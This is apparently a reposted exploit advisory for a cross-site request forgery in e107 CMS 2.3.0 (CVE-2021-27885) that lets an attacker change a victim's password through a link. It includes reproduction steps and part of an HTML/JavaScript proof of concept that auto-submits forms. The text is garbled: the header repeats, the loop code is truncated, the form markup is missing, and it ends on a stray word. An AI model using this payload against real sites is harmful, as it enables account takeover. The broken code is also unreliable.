Exploit/Advisories
Published on March 5th, 2021 📆 | 4137 Views ⚑
0e107 CMS 2.3.0 Cross Site Request Forgery – Torchsec
# Exploit Title: e107 CMS 2.3.0 - CSRF
# Date: 04/03/2021
# Exploit Author: Tadjmen
# Vendor Homepage: https://e107.org
# Software Link: https://e107.org/download
# Version: 2.3.0
# Tested on: Windows 10
# CVE : CVE-2021-27885
Cross Site Request Forgery (Edit Existing Admin details)
# Date: 04/03/2021
# Exploit Author: Tadjmen
# Vendor Homepage: https://e107.org
# Software Link: https://e107.org/download
# Version: 2.3.0
# Tested on: Windows 10
# CVE : CVE-2021-27885
CSRF vulnerability on e107 CMS
## Bug Description
Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link.
## How to Reproduce
Steps to reproduce the behavior:
1. Create a CSRF login POC using the following code.
```
< !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
function fireForms()
{
var count = 2;
var i=0;
for(i=0; i
document.forms[i].submit();
}
}
Gloss